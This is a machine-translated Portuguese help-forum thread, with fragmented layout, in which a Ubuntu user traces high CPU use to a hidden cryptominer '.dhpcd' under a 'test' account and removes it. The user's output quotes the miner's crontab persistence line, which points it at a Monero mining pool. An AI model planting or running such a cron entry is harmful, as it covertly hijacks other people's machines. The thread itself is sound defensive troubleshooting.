Atualmente, meu laptop costuma usar alto% de CPU (300%). Notei que .dhpcd
está envolvido em alta% de CPU. Eu poderia matar o processo sem nenhum problema. No entanto, ele liga automaticamente a cada 30 minutos. Estranhamente, o usuário está test
dentro top
(Veja o anexo). Gostaria de saber o que é, gostaria de saber como corrigi-lo ou desativá-lo completamente (se estiver tudo bem). Estou usando o ubuntu 16.04.5
A imagem é uma captura do top
momento .dhpcd
em que estava ligada.
sudo su test
e entãowhicht .dhpcd
?linux ".dhpcd"
. Eu acho que é malware e é muito novo.Respostas:
Vou sugerir várias coisas:
Desconecte seu sistema da Internet e veja se esse processo ainda é visto na
top
janela. Se estiver ausente, o perhpas que alguém ou processo instalado por alguém está usando sua CPU talvez para mineração de dados. Em seguida, tente as etapas abaixo.Procure-o em:
cronjobs
sudo crontab -l
: procure cronjobs estranhossudo find / -iname "*dhpc*"
Use
top
eps
:top
:pressione fe use as
arrow
teclas para mover e selecionar tudo ofields
que tem a ver comuser
e / ouuserid
ouid
em geral. Veja a captura de tela abaixo.Use spacebarpara selecionar os campos e pressione qpara sair.
Agora veja o que
PPID
,SUSER
,RUSER
,SUID
diz sobre esse processo. Para rastrear o culpado.fonte
*dhpc*
vez de*dhcp*
?*dhpc*
..dhpcd
não começou offline. Assim que eu ficar on-line, o processo começou.sudo crontab -l
mostrouno crontab for root
.De
sudo find / -iname "*dhpc*"
, encontrei o seguinte:/home/test/.dhpcd
Além disso, a imagem anexada é capturada a partir de
top
.Este é o resultado de `` ls -al ':
Há um tempo atrás, eu criei a página git apenas para praticar. Algo peixe está acontecendo aqui ..
fonte
sudo crontab -l -u test
? Alguma coisa está provocando isso ....dhpcd
executar. A saída é18 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -t3 -B >/dev/null 2>/dev/null
. Vou executar seu comando novamente após o.dhpcd
início..dhpcd
está em execução, a saída é18 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -t3 -B >/dev/null 2>/dev/null
Na verdade, é a mesma coisa .. haha .. @vidalo, Você tem mais alguma sugestão? Caso contrário,test
excluirei o usuário como George Udosen sugeriu.crontab -e
para editar) e verificar outros arquivos como.bashrc
, e remover.dhcpd
.sudo deluser --system --remove-all-files test
. No entanto, seu sistema ainda será suspeito.Obrigado a todos pela ajuda, especialmente George Udosen e Doug Smythies.
Alguns dos comandos mais práticos foram:
top
: Para descobrir qual comando estava levando toda a minha CPU; Eu descobri que.dhpcd
estava usando toda a minha CPU. Note que é diferente dedhcpcd
.Pesquisando com
linux ".dhpcd"
: Para aprender o que é ...sudo find / -iname "*dhpc*"
: Para descobrir qual diretório continha.dhpcd
.sudo userdel -r test
: Para se livrar de um usuáriotest
. Isso ocorreu porque.dhpcd
foi executado por um usuário suspeito chamadotest
.sudo deluser --system --remove-all-files test
: Para remover todos os arquivos criados por um usuáriotest
.Finalmente, reiniciei meu laptop, e o problema acabou.
Observe que não lembro se havia criado o usuário
test
. Como não uso a conta, excluí tudo relacionado a ela. Agora eu sei se o problema teria sido resolvido excluindo apenas.dhpcd
.fonte